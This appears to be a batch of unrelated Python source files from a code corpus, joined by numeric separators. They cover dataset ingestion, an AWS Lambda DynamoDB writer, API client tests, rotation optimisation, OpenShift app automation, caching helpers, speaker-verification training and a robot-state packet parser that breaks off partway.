if not self.skipimg:
transform_and_save(img_arr=train_x[i], output_filename=os.path.join(outdir, str(idx[train_y[i]-1]) + '.jpg'))
self.trainpairlist[os.path.join('images', 'train', str(train_y[i]-1), str(idx[train_y[i]-1]) + '.jpg')] = \
os.path.join('labels', str(train_y[i] - 1) + '.txt')
idx[train_y[i]-1] += 1
idx = np.zeros(10, dtype=np.int)
for i in xrange(test_x.shape[0]):
outdir = os.path.join(self.outimgdir, 'val', str(test_y[i]-1))
if not os.path.exists(outdir):
os.mkdir(outdir)
if not self.skipimg:
transform_and_save(img_arr=test_x[i],
output_filename=os.path.join(outdir, str(idx[test_y[i]-1]) + '.jpg'))
self.valpairlist[os.path.join('images', 'val', str(test_y[i]-1), str(idx[test_y[i]-1]) + '.jpg')] = \
os.path.join('labels', str(test_y[i] - 1) + '.txt')
idx[test_y[i]-1] += 1
print 'Finished Collect Data...'
def write_label(self, ):
for i, l in enumerate(self.labels):
sdir = os.path.join(self.outlabeldir, str(i) + '.txt')
np.savetxt(sdir, [l], '%d')
def run(self):
"""
resize images then write manifest files to disk.
"""
self.write_label()
self.collectdata()
records = [(fname, tgt)
for fname, tgt in self.trainpairlist.items()]
np.savetxt(self.manifests['train'], records, fmt='%s,%s')
records = [(fname, tgt)
for fname, tgt in self.valpairlist.items()]
np.savetxt(self.manifests['val'], records, fmt='%s,%s')
class IngestUnlabeled(object):
def __init__(self, input_dir, out_dir, target_size=96, skipimg=False):
np.random.seed(0)
self.skipimg = skipimg
self.out_dir = out_dir
self.input_dir = input_dir
self.manifests = dict()
self.manifests = os.path.join(self.out_dir, 'unlabeled-index.csv')
self.target_size = target_size
self.trainpairlist = {}
if not os.path.exists(self.out_dir):
os.mkdir(self.out_dir)
self.outimgdir = os.path.join(self.out_dir, 'images')
if not os.path.exists(self.outimgdir):
os.mkdir(self.outimgdir)
self.unlabeldir = os.path.join(self.outimgdir, 'unlabeled')
if not os.path.exists(self.unlabeldir):
os.mkdir(self.unlabeldir)
def collectdata(self,):
print 'Start Collect Data...'
train_x_path = os.path.join(self.input_dir, 'unlabeled_X.bin')
train_xf = open(train_x_path, 'rb')
train_x = np.fromfile(train_xf, dtype=np.uint8)
train_x = np.reshape(train_x, (-1, 3, 96, 96))
train_x = np.transpose(train_x, (0, 3, 2, 1))
idx = 0
for i in xrange(train_x.shape[0]):
if not self.skipimg:
transform_and_save(img_arr=train_x[i], output_filename=os.path.join(self.unlabeldir, str(idx) + '.jpg'))
self.trainpairlist[os.path.join('images', 'unlabeled', str(idx) + '.jpg')] = 'labels/11.txt'
idx += 1
print 'Finished Collect Data...'
def write_label(self, ):
sdir = os.path.join(self.out_dir, 'labels', '11.txt')
np.savetxt(sdir, [11], '%d')
def run(self):
"""
resize images then write manifest files to disk.
"""
self.write_label()
self.collectdata()
records = [(fname, tgt)
for fname, tgt in self.trainpairlist.items()]
np.savetxt(self.manifests, records, fmt='%s,%s')
if __name__ == "__main__":
parser = ArgParser()
parser.add_argument('--input_dir', help='Directory to find input',
default='/hdd/Dataset/STL10')
parser.add_argument('--out_dir', help='Directory to write ingested files',
default='/home/william/PyProjects/TFcodes/dataset/stl10')
parser.add_argument('--target_size', type=int, default=96,
help='Size in pixels to scale shortest side DOWN to (0 means no scaling)')
parser.add_argument('--skipImg', type=bool, default=False,
help='True to skip processing and copying images')
args = parser.parse_args()
logger = logging.getLogger(__name__)
bw = Ingest(input_dir=args.input_dir, out_dir=args.out_dir, target_size=args.target_size, skipimg=args.skipImg)
# bw = IngestUnlabeled(input_dir=args.input_dir, out_dir=args.out_dir, target_size=args.target_size, skipimg=args.skipImg)
bw.run()
|
29816
|
import os
import json
import boto3
def handler(event, context):
table = os.environ.get('table')
dynamodb = boto3.client('dynamodb')
item = {
"name":{'S':event["queryStringParameters"]["name"]},
"location":{'S':event["queryStringParameters"]["location"]},
"age":{'S':event["queryStringParameters"]["age"]}
}
response = dynamodb.put_item(TableName=table,
Item=item
)
message = 'Status of the write to DynamoDB {}!'.format(response)
return {
"statusCode": 200,
"body": json.dumps(message)
}
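def _example_event():
    # Illustrative sketch only (not part of the original handler): the shape of
    # the API Gateway proxy event this handler expects. All values are
    # placeholders, not real data.
    return {
        "queryStringParameters": {
            "name": "alice",
            "location": "seattle",
            "age": "30",
        }
    }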
|
29825
|
import os
from starlette.applications import Starlette
from starlette.responses import PlainTextResponse, Response
from starlette.testclient import TestClient
from apistar.client import Client, decoders
app = Starlette()
@app.route("/text-response/")
def text_response(request):
return PlainTextResponse("hello, world")
@app.route("/file-response/")
def file_response(request):
headers = {
"Content-Type": "image/png",
"Content-Disposition": 'attachment; filename="filename.png"',
}
return Response(b"<somedata>", headers=headers)
@app.route("/file-response-url-filename/name.png")
def file_response_url_filename(request):
headers = {"Content-Type": "image/png", "Content-Disposition": "attachment"}
return Response(b"<somedata>", headers=headers)
@app.route("/file-response-no-extension/name")
def file_response_no_extension(request):
headers = {"Content-Type": "image/png", "Content-Disposition": "attachment"}
return Response(b"<somedata>", headers=headers)
@app.route("/")
def file_response_no_name(request):
headers = {"Content-Type": "image/png", "Content-Disposition": "attachment"}
return Response(b"<somedata>", headers=headers)
schema = {
"openapi": "3.0.0",
"info": {"title": "Test API", "version": "1.0"},
"servers": [{"url": "http://testserver"}],
"paths": {
"/text-response/": {"get": {"operationId": "text-response"}},
"/file-response/": {"get": {"operationId": "file-response"}},
"/file-response-url-filename/name.png": {
"get": {"operationId": "file-response-url-filename"}
},
"/file-response-no-extension/name": {
"get": {"operationId": "file-response-no-extension"}
},
"/": {"get": {"operationId": "file-response-no-name"}},
},
}
def test_text_response():
client = Client(schema, session=TestClient(app))
data = client.request("text-response")
assert data == "hello, world"
def test_file_response():
client = Client(schema, session=TestClient(app))
data = client.request("file-response")
assert os.path.basename(data.name) == "filename.png"
assert data.read() == b"<somedata>"
def test_file_response_url_filename():
client = Client(schema, session=TestClient(app))
data = client.request("file-response-url-filename")
assert os.path.basename(data.name) == "name.png"
assert data.read() == b"<somedata>"
def test_file_response_no_extension():
client = Client(schema, session=TestClient(app))
data = client.request("file-response-no-extension")
assert os.path.basename(data.name) == "name.png"
assert data.read() == b"<somedata>"
def test_file_response_no_name():
client = Client(schema, session=TestClient(app))
data = client.request("file-response-no-name")
assert os.path.basename(data.name) == "download.png"
assert data.read() == b"<somedata>"
def test_unique_filename(tmpdir):
client = Client(
schema, session=TestClient(app), decoders=[decoders.DownloadDecoder(tmpdir)]
)
data = client.request("file-response")
assert os.path.basename(data.name) == "filename.png"
assert data.read() == b"<somedata>"
data = client.request("file-response")
assert os.path.basename(data.name) == "filename (1).png"
assert data.read() == b"<somedata>"
|
29891
|
import numpy as np
import math
from scipy.optimize import minimize
class Optimize():
def __init__(self):
self.c_rad2deg = 180.0 / np.pi
self.c_deg2rad = np.pi / 180.0
def isRotationMatrix(self, R) :
Rt = np.transpose(R)
shouldBeIdentity = np.dot(Rt, R)
I = np.identity(3, dtype = R.dtype)
n = np.linalg.norm(I - shouldBeIdentity)
# print('n: ' + str(n))
return n < 1e-6
def Rot_Matrix_2_Euler_Angles(self, R):
assert(self.isRotationMatrix(R))
pitch = -math.asin(R[1, 2])
roll = -math.atan2(R[1, 0], R[1, 1])
yaw = -math.atan2(R[0, 2], R[2, 2])
return np.array([roll, pitch, yaw])
def Get_Init_Guess(self, l_vec, b_vec, f_vec):
f_vec = np.cross(b_vec, l_vec)
l_vec = np.cross(f_vec, b_vec)
l_norm = np.linalg.norm(l_vec)
l_vec /= l_norm
b_norm = np.linalg.norm(b_vec)
b_vec /= b_norm
f_norm = np.linalg.norm(f_vec)
f_vec /= f_norm
l_vec = l_vec.reshape(3, 1)
b_vec = b_vec.reshape(3, 1)
f_vec = f_vec.reshape(3, 1)
l = np.array([1, 0, 0]).reshape(1, 3)
b = np.array([0, 1, 0]).reshape(1, 3)
f = np.array([0, 0, 1]).reshape(1, 3)
R = l_vec @ l + b_vec @ b + f_vec @ f
assert (R.shape == (3, 3))
roll, pitch, yaw = self.Rot_Matrix_2_Euler_Angles(R)
return np.array([roll, pitch, yaw])
def Euler_Angles_2_Vectors(self, rx, ry, rz):
'''
rx: pitch
ry: yaw
rz: roll
'''
ry *= -1
rz *= -1
R_x = np.array([[1.0, 0.0, 0.0],
[0.0, np.cos(rx), -np.sin(rx)],
[0.0, np.sin(rx), np.cos(rx)]])
R_y = np.array([[np.cos(ry), 0.0, np.sin(ry)],
[0.0, 1.0, 0.0],
[-np.sin(ry), 0.0, np.cos(ry)]])
R_z = np.array([[np.cos(rz), -np.sin(rz), 0.0],
[np.sin(rz), np.cos(rz), 0.0],
[0.0, 0.0, 1.0]])
R = R_y @ R_x @ R_z
l_vec = R @ np.array([1, 0, 0])
b_vec = R @ np.array([0, 1, 0])
f_vec = R @ np.array([0, 0, 1])
return np.array([l_vec, b_vec, f_vec])
def Objective(self, x, l_vec, b_vec, f_vec):
rx = x[0]
ry = x[1]
rz = x[2]
l_hat, b_hat, f_hat = self.Euler_Angles_2_Vectors(rx, ry, rz)
l_vec_dot = np.clip(l_hat[0] * l_vec[0] + l_hat[1] * l_vec[1] + l_hat[2] * l_vec[2], -1, 1)
b_vec_dot = np.clip(b_hat[0] * b_vec[0] + b_hat[1] * b_vec[1] + b_hat[2] * b_vec[2], -1, 1)
f_vec_dot = np.clip(f_hat[0] * f_vec[0] + f_hat[1] * f_vec[1] + f_hat[2] * f_vec[2], -1, 1)
return math.acos(l_vec_dot) ** 2 + math.acos(b_vec_dot) ** 2 + math.acos(f_vec_dot) ** 2
def Get_Ortho_Vectors(self, l_vec, b_vec, f_vec):
x0 = self.Get_Init_Guess(l_vec, b_vec, f_vec)
sol = minimize(self.Objective, x0, args=(l_vec, b_vec, f_vec), method='nelder-mead', options={'xatol': 1e-7, 'disp': False})
pitch_rad, yaw_rad, roll_rad = sol.x
v1, v2, v3 = self.Euler_Angles_2_Vectors(pitch_rad, yaw_rad, roll_rad)
return np.array([v1, v2, v3])
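def _demo_get_ortho_vectors():
    # Illustrative sketch only (not part of the original module): feeds three
    # roughly (but not exactly) orthogonal left/back/forward vectors to
    # Get_Ortho_Vectors and returns the orthonormalised triple.
    opt = Optimize()
    l_vec = np.array([1.0, 0.02, -0.01])
    b_vec = np.array([0.01, 1.0, 0.03])
    f_vec = np.array([0.0, 0.0, 1.0])
    return opt.Get_Ortho_Vectors(l_vec, b_vec, f_vec)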
|
29898
|
from django.apps import AppConfig
class AldrynSearchConfig(AppConfig):
name = 'aldryn_search'
def ready(self):
from . import conf # noqa
|
29941
|
from typing import List
class Solution:
def getFormattedEMail(self, email):
userName, domain = email.split('@')
if '+' in userName:
userName = userName.split('+')[0]
if '.' in userName:
userName = ''.join(userName.split('.'))
return userName + '@' + domain
def numUniqueEmails(self, emails: List[str]) -> int:
emailsSet = set()
for email in emails:
emailsSet.add(self.getFormattedEMail(email))
return len(emailsSet)
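def _demo_num_unique_emails():
    # Illustrative sketch only (not part of the original solution): both
    # addresses normalise to "testemail@leetcode.com", so the count is 1.
    emails = ["test.email+alex@leetcode.com", "test.e.mail+bob.cathy@leetcode.com"]
    return Solution().numUniqueEmails(emails)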
|
29945
|
class SendResult:
def __init__(self, result={}):
self.successful = result.get('code', None) == '200'
self.message_id = result.get('message_id', None)
|
29948
|
from .GlobalData import global_data
from .utils.oc import oc
import requests
import time
import logging
class App:
def __init__(self, deployment, project, template, build_config,route=""):
self.project = project
self.template = template
self.deployment = deployment
self.build_config = build_config
self.route = route
self.logger = logging.getLogger('reliability')
def build(self, kubeconfig):
(result, rc) = oc("start-build -n " + self.project + " " + self.build_config, kubeconfig)
if rc != 0:
self.logger.error("build_app: Failed to create app " + self.deployment + " in project " + self.project)
return "App build failed for build config : " + self.build_config
else:
with global_data.builds_lock:
global_data.total_build_count += 1
return "App build succeeded for build config : " + self.build_config
def visit(self):
visit_success = False
try:
r = requests.get("http://" + self.route + "/")
self.logger.info(str(r.status_code) + ": visit: " + self.route)
if r.status_code == 200:
visit_success = True
except Exception as e :
self.logger.error(f"visit: {self.route} Exception {e}")
return visit_success
def scale_up(self, kubeconfig):
(result, rc) = oc("scale --replicas=2 -n " + self.project + " dc/" + self.deployment, kubeconfig)
if rc !=0 :
self.logger.error("scale_up: Failed to scale up " + self.project + "." + self.deployment)
return "App scale up failed for deployment : " + self.deployment
else:
return "App scale up succeeded for deployment : " + self.deployment
def scale_down(self, kubeconfig):
(result, rc) = oc("scale --replicas=1 -n " + self.project + " dc/" + self.deployment, kubeconfig)
if rc !=0 :
self.logger.error("scale_down: Failed to scale down " + self.project + "." + self.deployment)
return "App scale down failed for deployment : " + self.deployment
else:
return "App scale down succeeded for deployment : " + self.deployment
class Apps:
def __init__(self):
self.failed_apps = 0
self.apps = {}
self.logger = logging.getLogger('reliability')
def add(self, app, kubeconfig):
(result, rc) = oc("new-app -n " + app.project + " --template " + app.template, kubeconfig)
if rc != 0:
self.logger.error("create_app: Failed to create app " + app.deployment + " in project " + app.project)
return None
else:
self.apps[app.project + "." + app.deployment] = app
(route,rc) = oc("get route --no-headers -n " + app.project + " | awk {'print $2'} | grep " + app.template, kubeconfig)
if rc == 0:
app.route = route.rstrip()
max_tries = 60
current_tries = 0
visit_success = False
while not visit_success and current_tries <= max_tries:
self.logger.info(app.template + " route not available yet, sleeping 10 seconds")
time.sleep(10)
current_tries += 1
visit_success = app.visit()
if not visit_success:
self.failed_apps += 1
self.logger.error("add_app: " + app.project + "." + app.deployment + " did not become available" )
return app
# removing an app just removes the dictionary entry, actual app removed by project deletion
def remove(self,app):
self.apps.pop(app.project + "." + app.deployment)
def simulate(self):
apps = {}
app1 = App('cakephp-mysql-example','cakephp-mysql-example-0','cakephp-mysql-example','cakephp-mysql-example')
self.apps[app1.project + "." + app1.deployment] = app1
# app2 = App('nodejs-mongodb-example','nodejs-mongodb-example-1','nodejs-mongodb-example','nodejs-mongodb-example')
# self.apps[app2.project + "." + app2.deployment] = app2
def init(self):
pass
all_apps=Apps()
if __name__ == "__main__":
app = App("cakephp-mysql-example", "t1", "cakephp-mysql-example","cakephp-mysql-example")
apps = Apps()
# apps.add(app)
# time.sleep(180)
app.visit()
app.scale_up()
time.sleep(30)
app.scale_down()
app.build()
|
29963
|
import requests_cache
import os.path
import tempfile
try:
from requests_cache import remove_expired_responses
except ModuleNotFoundError:
from requests_cache.core import remove_expired_responses
def caching(
cache=False,
name=None,
backend="sqlite",
expire_after=86400,
allowable_codes=(200,),
allowable_methods=("GET",),
):
"""
pygbif caching management
:param cache: [bool] if ``True`` all http requests are cached. if ``False`` (default),
no http requests are cached.
:param name: [str] the cache name. when backend=sqlite, this is the path for the
sqlite file, ignored if sqlite not used. if not set, the file is put in your
temporary directory, and therefore is cleaned up/deleted after closing your
python session
:param backend: [str] the backend, one of:
- ``sqlite`` sqlite database (default)
- ``memory`` not persistent, stores all data in Python dict in memory
- ``mongodb`` (experimental) MongoDB database (pymongo < 3.0 required)
- ``redis`` stores all data on a redis data store (redis required)
:param expire_after: [str] timedelta or number of seconds after cache will be expired
or None (default) to ignore expiration. default: 86400 seconds (24 hrs)
:param allowable_codes: [tuple] limit caching only for response with this codes
(default: 200)
:param allowable_methods: [tuple] cache only requests of this methods
(default: ‘GET’)
:return: sets options to be used by pygbif, returns the options you selected
in a hash
Note: setting cache=False will turn off caching, but the backend data still
persists. thus, you can turn caching back on without losing your cache.
this also means if you want to delete your cache you have to do it yourself.
Note: on loading pygbif, we clean up expired responses
Usage::
import pygbif
# caching is off by default
from pygbif import occurrences
%time z=occurrences.search(taxonKey = 3329049)
%time w=occurrences.search(taxonKey = 3329049)
# turn caching on
pygbif.caching(True)
%time z=occurrences.search(taxonKey = 3329049)
%time w=occurrences.search(taxonKey = 3329049)
# set a different backend
pygbif.caching(cache=True, backend="redis")
%time z=occurrences.search(taxonKey = 3329049)
%time w=occurrences.search(taxonKey = 3329049)
# set a different backend
pygbif.caching(cache=True, backend="mongodb")
%time z=occurrences.search(taxonKey = 3329049)
%time w=occurrences.search(taxonKey = 3329049)
# set path to a sqlite file
pygbif.caching(name = "some/path/my_file")
"""
default_name = "pygbif_requests_cache"
if not cache:
requests_cache.uninstall_cache()
CACHE_NAME = None
else:
if name is None and backend == "sqlite":
CACHE_NAME = os.path.join(tempfile.gettempdir(), default_name)
else:
CACHE_NAME = default_name
requests_cache.install_cache(
cache_name=CACHE_NAME, backend=backend, expire_after=expire_after
)
remove_expired_responses()
cache_settings = {
"cache": cache,
"name": CACHE_NAME,
"backend": backend,
"expire_after": expire_after,
"allowable_codes": allowable_codes,
"allowable_methods": allowable_methods,
}
return cache_settings
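def _demo_caching_settings():
    # Illustrative sketch only (not part of the original module): enable the
    # default sqlite-backed cache and inspect the settings dict that caching()
    # returns (the resolved cache name lives in a temporary directory).
    settings = caching(cache=True)
    return settings["name"], settings["backend"], settings["expire_after"]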
|
29965
|
import os, sys
exp_id=[
"exp1.0",
]
env_source=[
"file",
]
exp_mode = [
"continuous",
#"newb",
#"base",
]
num_theories_init=[
4,
]
pred_nets_neurons=[
8,
]
pred_nets_activation=[
"linear",
# "leakyRelu",
]
domain_net_neurons=[
8,
]
domain_pred_mode=[
"onehot",
]
mse_amp=[
1e-7,
]
simplify_criteria=[
'\("DLs",0,3,"relative"\)',
]
scheduler_settings=[
'\("ReduceLROnPlateau",40,0.1\)',
]
optim_type=[
'\("adam",5e-3\)',
]
optim_domain_type=[
'\("adam",1e-3\)',
]
reg_amp=[
1e-8,
]
reg_domain_amp = [
1e-5,
]
batch_size = [
2000,
]
loss_core = [
"DLs",
]
loss_order = [
-1,
]
loss_decay_scale = [
"None",
]
is_mse_decay = [
False,
]
loss_balance_model_influence = [
False,
]
num_examples = [
20000,
]
iter_to_saturation = [
5000,
]
MDL_mode = [
"both",
]
num_output_dims = [
2,
]
num_layers = [
3,
]
is_pendulum = [
False,
]
date_time = [
"10-9",
]
seed = [
0,
30,
60,
90,
120,
150,
180,
210,
240,
270,
]
def assign_array_id(array_id, param_list):
if len(param_list) == 0:
print("redundancy: {0}".format(array_id))
return []
else:
param_bottom = param_list[-1]
length = len(param_bottom)
current_param = param_bottom[array_id % length]
return assign_array_id(int(array_id / length), param_list[:-1]) + [current_param]
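def _demo_assign_array_id():
    # Worked example (illustrative only): array_id is decoded as a mixed-radix
    # number whose digits index the parameter lists, with the last list varying
    # fastest. Here 5 % 2 = 1 picks 1 from the second list and 5 // 2 = 2 picks
    # "c" from the first, so the result is ["c", 1].
    return assign_array_id(5, [["a", "b", "c"], [0, 1]])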
array_id = int(sys.argv[1])
param_list = [exp_id,
env_source,
exp_mode,
num_theories_init,
pred_nets_neurons,
pred_nets_activation,
domain_net_neurons,
domain_pred_mode,
mse_amp,
simplify_criteria,
scheduler_settings,
optim_type,
optim_domain_type,
reg_amp,
reg_domain_amp,
batch_size,
loss_core,
loss_order,
loss_decay_scale,
is_mse_decay,
loss_balance_model_influence,
num_examples,
iter_to_saturation,
MDL_mode,
num_output_dims,
num_layers,
is_pendulum,
date_time,
seed,
]
param_chosen = assign_array_id(array_id, param_list)
exec_str = "python ../theory_learning/theory_exp.py"
for param in param_chosen:
exec_str += " {0}".format(param)
exec_str += " {0}".format(array_id)
print(param_chosen)
print(exec_str)
from shutil import copyfile
current_PATH = os.path.dirname(os.path.realpath(__file__))
def make_dir(filename):
import os
import errno
if not os.path.exists(os.path.dirname(filename)):
print("directory {0} does not exist, created.".format(os.path.dirname(filename)))
try:
os.makedirs(os.path.dirname(filename))
except OSError as exc: # Guard against race condition
if exc.errno != errno.EEXIST:
print(exc)
raise
filename = "../data/" + "{0}_{1}/".format(param_chosen[0], param_chosen[-2])
make_dir(filename)
fc = "run_theory.py"
if not os.path.isfile(filename + fc):
copyfile(current_PATH + "/" + fc, filename + fc)
os.system(exec_str)
|
29991
|
import sys
if len(sys.argv) != 4 :
print 'usage:', sys.argv[0], 'index_fn id_mapping_fn output_fn'
exit(9)
a = open(sys.argv[1])
a.readline()
header = a.readline()
dir = a.readline()
#build map: filename -> set of bad samples
mp = {}
mp_good = {}
mp_bad = {}
for line in a :
t = line.split()
mp[t[0]] = set()
mp_good[t[0]] = t[1]
mp_bad[t[0]] = t[2]
for id in t[3:] :
mp[t[0]].add(id)
a.close()
out = open(sys.argv[3], 'w')
out.write('CONDUIT_HDF5_INCLUSION\n')
out.write(header)
out.write(dir)
a = open(sys.argv[2])
bad = 0
for line in a :
t = line.split()
fn = t[0]
out.write(fn + ' ' + mp_good[fn] + ' ' + mp_bad[fn] + ' ')
for id in t[1:] :
if id not in mp[fn] :
out.write(id + ' ')
else :
bad += 1
out.write('\n')
out.close()
print header
print 'num found bad:', bad
|
29994
|
import tensorflow as tf
import numpy as np
import os
import time
from utils import random_batch, normalize, similarity, loss_cal, optim
from configuration import get_config
from tensorflow.contrib import rnn
config = get_config()
def train(path):
tf.reset_default_graph() # reset graph
# draw graph
batch = tf.placeholder(shape= [None, config.N*config.M, 40], dtype=tf.float32) # input batch (time x batch x n_mel)
lr = tf.placeholder(dtype= tf.float32) # learning rate
global_step = tf.Variable(0, name='global_step', trainable=False)
w = tf.get_variable("w", initializer= np.array([10], dtype=np.float32))
b = tf.get_variable("b", initializer= np.array([-5], dtype=np.float32))
# embedding lstm (3-layer default)
with tf.variable_scope("lstm"):
lstm_cells = [tf.contrib.rnn.LSTMCell(num_units=config.hidden, num_proj=config.proj) for i in range(config.num_layer)]
lstm = tf.contrib.rnn.MultiRNNCell(lstm_cells) # define lstm op and variables
outputs, _ = tf.nn.dynamic_rnn(cell=lstm, inputs=batch, dtype=tf.float32, time_major=True) # for TI-VS must use dynamic rnn
        embedded = outputs[-1] # the last output is the embedded d-vector
embedded = normalize(embedded) # normalize
print("embedded size: ", embedded.shape)
# loss
sim_matrix = similarity(embedded, w, b)
print("similarity matrix size: ", sim_matrix.shape)
loss = loss_cal(sim_matrix, type=config.loss)
# optimizer operation
trainable_vars= tf.trainable_variables() # get variable list
optimizer= optim(lr) # get optimizer (type is determined by configuration)
grads, vars= zip(*optimizer.compute_gradients(loss)) # compute gradients of variables with respect to loss
grads_clip, _ = tf.clip_by_global_norm(grads, 3.0) # l2 norm clipping by 3
grads_rescale= [0.01*grad for grad in grads_clip[:2]] + grads_clip[2:] # smaller gradient scale for w, b
train_op= optimizer.apply_gradients(zip(grads_rescale, vars), global_step= global_step) # gradient update operation
# check variables memory
variable_count = np.sum(np.array([np.prod(np.array(v.get_shape().as_list())) for v in trainable_vars]))
print("total variables :", variable_count)
# record loss
loss_summary = tf.summary.scalar("loss", loss)
merged = tf.summary.merge_all()
saver = tf.train.Saver()
# training session
with tf.Session() as sess:
tf.global_variables_initializer().run()
os.makedirs(os.path.join(path, "Check_Point"), exist_ok=True) # make folder to save model
os.makedirs(os.path.join(path, "logs"), exist_ok=True) # make folder to save log
writer = tf.summary.FileWriter(os.path.join(path, "logs"), sess.graph)
epoch = 0
lr_factor = 1 # lr decay factor ( 1/2 per 10000 iteration)
loss_acc = 0 # accumulated loss ( for running average of loss)
for iter in range(config.iteration):
# run forward and backward propagation and update parameters
_, loss_cur, summary = sess.run([train_op, loss, merged],
feed_dict={batch: random_batch(), lr: config.lr*lr_factor})
loss_acc += loss_cur # accumulated loss for each 100 iteration
if iter % 10 == 0:
writer.add_summary(summary, iter) # write at tensorboard
if (iter+1) % 100 == 0:
print("(iter : %d) loss: %.4f" % ((iter+1),loss_acc/100))
loss_acc = 0 # reset accumulated loss
if (iter+1) % 10000 == 0:
lr_factor /= 2 # lr decay
print("learning rate is decayed! current lr : ", config.lr*lr_factor)
if (iter+1) % 10000 == 0:
saver.save(sess, os.path.join(path, "./Check_Point/model.ckpt"), global_step=iter//10000)
print("model is saved!")
# Test Session
def test(path):
tf.reset_default_graph()
# draw graph
enroll = tf.placeholder(shape=[None, config.N*config.M, 40], dtype=tf.float32) # enrollment batch (time x batch x n_mel)
verif = tf.placeholder(shape=[None, config.N*config.M, 40], dtype=tf.float32) # verification batch (time x batch x n_mel)
batch = tf.concat([enroll, verif], axis=1)
# embedding lstm (3-layer default)
with tf.variable_scope("lstm"):
lstm_cells = [tf.contrib.rnn.LSTMCell(num_units=config.hidden, num_proj=config.proj) for i in range(config.num_layer)]
lstm = tf.contrib.rnn.MultiRNNCell(lstm_cells) # make lstm op and variables
outputs, _ = tf.nn.dynamic_rnn(cell=lstm, inputs=batch, dtype=tf.float32, time_major=True) # for TI-VS must use dynamic rnn
        embedded = outputs[-1] # the last output is the embedded d-vector
embedded = normalize(embedded) # normalize
print("embedded size: ", embedded.shape)
# enrollment embedded vectors (speaker model)
enroll_embed = normalize(tf.reduce_mean(tf.reshape(embedded[:config.N*config.M, :], shape= [config.N, config.M, -1]), axis=1))
# verification embedded vectors
verif_embed = embedded[config.N*config.M:, :]
similarity_matrix = similarity(embedded=verif_embed, w=1., b=0., center=enroll_embed)
saver = tf.train.Saver(var_list=tf.global_variables())
with tf.Session() as sess:
tf.global_variables_initializer().run()
# load model
print("model path :", path)
ckpt = tf.train.get_checkpoint_state(checkpoint_dir=os.path.join(path, "Check_Point"))
ckpt_list = ckpt.all_model_checkpoint_paths
loaded = 0
for model in ckpt_list:
if config.model_num == int(model.split('-')[-1]): # find ckpt file which matches configuration model number
print("ckpt file is loaded !", model)
loaded = 1
saver.restore(sess, model) # restore variables from selected ckpt file
break
if loaded == 0:
raise AssertionError("ckpt file does not exist! Check config.model_num or config.model_path.")
print("test file path : ", config.test_path)
# return similarity matrix after enrollment and verification
time1 = time.time() # for check inference time
if config.tdsv:
S = sess.run(similarity_matrix, feed_dict={enroll:random_batch(shuffle=False, noise_filenum=1),
verif:random_batch(shuffle=False, noise_filenum=2)})
else:
S = sess.run(similarity_matrix, feed_dict={enroll:random_batch(shuffle=False),
verif:random_batch(shuffle=False, utter_start=config.M)})
S = S.reshape([config.N, config.M, -1])
time2 = time.time()
np.set_printoptions(precision=2)
print("inference time for %d utterences : %0.2fs"%(2*config.M*config.N, time2-time1))
print(S) # print similarity matrix
# calculating EER
diff = 1; EER=0; EER_thres = 0; EER_FAR=0; EER_FRR=0
# through thresholds calculate false acceptance ratio (FAR) and false reject ratio (FRR)
for thres in [0.01*i+0.5 for i in range(50)]:
S_thres = S>thres
# False acceptance ratio = false acceptance / mismatched population (enroll speaker != verification speaker)
FAR = sum([np.sum(S_thres[i])-np.sum(S_thres[i,:,i]) for i in range(config.N)])/(config.N-1)/config.M/config.N
# False reject ratio = false reject / matched population (enroll speaker = verification speaker)
FRR = sum([config.M-np.sum(S_thres[i][:,i]) for i in range(config.N)])/config.M/config.N
# Save threshold when FAR = FRR (=EER)
if diff> abs(FAR-FRR):
diff = abs(FAR-FRR)
EER = (FAR+FRR)/2
EER_thres = thres
EER_FAR = FAR
EER_FRR = FRR
print("\nEER : %0.2f (thres:%0.2f, FAR:%0.2f, FRR:%0.2f)"%(EER,EER_thres,EER_FAR,EER_FRR))
|
30036
|
from collections import OrderedDict
import numpy as np
from pandas import DataFrame
from sv import SVData, CorTiming
def loadSVDataFromBUGSDataset(filepath, logreturnforward, logreturnscale, dtfilepath=None):
dts = None
if dtfilepath is not None:
with open(dtfilepath) as f:
content = f.readlines()
dts = np.array([float(x) for x in content[1:-1]])
with open(filepath) as f:
content = f.readlines()
logreturns = np.array([float(x) for x in content[1:-1]])
times = range(len(logreturns))
if dts is not None:
svdf = DataFrame(OrderedDict((('logreturn', logreturns), ('dt', dts))), index=times)
else:
svdf = DataFrame(OrderedDict((('logreturn', logreturns),)), index=times)
return SVData(
sourcekind='loader',
source=loadSVDataFromBUGSDataset,
svdf=svdf,
params=None,
cortiming=CorTiming.unknown,
logreturnforward=logreturnforward,
logreturnscale=logreturnscale)
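# Illustrative call (the file names and argument values below are hypothetical,
# not taken from the original project):
#     svdata = loadSVDataFromBUGSDataset('logreturns.txt',
#                                        logreturnforward=True,
#                                        logreturnscale=100.0,
#                                        dtfilepath='dts.txt')
#     print(svdata.svdf.head())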
|
30042
|
from __future__ import print_function
import struct
import copy
#this class handles different protocol versions
class RobotStateRT(object):
@staticmethod
def unpack(buf):
rs = RobotStateRT()
(plen, ptype) = struct.unpack_from("!IB", buf)
if plen == 756:
return RobotStateRT_V15.unpack(buf)
elif plen == 812:
return RobotStateRT_V18.unpack(buf)
elif plen == 1044:
return RobotStateRT_V30.unpack(buf)
else:
print("RobotStateRT has wrong length: " + str(plen))
return rs
#this parses RobotStateRT for versions = v1.5
#http://wiki03.lynero.net/Technical/RealTimeClientInterface?foswiki_redirect_cache=9b4574b30760f720c6f79c5f1f2203dd
class RobotStateRT_V15(object):
__slots__ = ['time',
'q_target', 'qd_target', 'qdd_target', 'i_target', 'm_target',
'q_actual', 'qd_actual', 'i_actual', 'tool_acc_values',
'unused',
'tcp_force', 'tool_vector', 'tcp_speed',
'digital_input_bits', 'motor_temperatures', 'controller_timer',
'test_value']
@staticmethod
def unpack(buf):
offset = 0
message_size = struct.unpack_from("!i", buf, offset)[0]
offset+=4
if message_size != len(buf):
print(("MessageSize: ", message_size, "; BufferSize: ", len(buf)))
raise Exception("Could not unpack RobotStateRT packet: length field is incorrect")
rs = RobotStateRT_V15()
#time: 1x double (1x 8byte)
rs.time = struct.unpack_from("!d",buf, offset)[0]
offset+=8
#q_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.q_target = copy.deepcopy(all_values)
#qd_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qd_target = copy.deepcopy(all_values)
#qdd_target: 6x double (6x 8byte)
all_values = list(struct.unpack_from("!dddddd",buf, offset))
offset+=6*8
rs.qdd_target = copy.deepcopy(all_values)
#i_target: 6x double (6x 8byte)
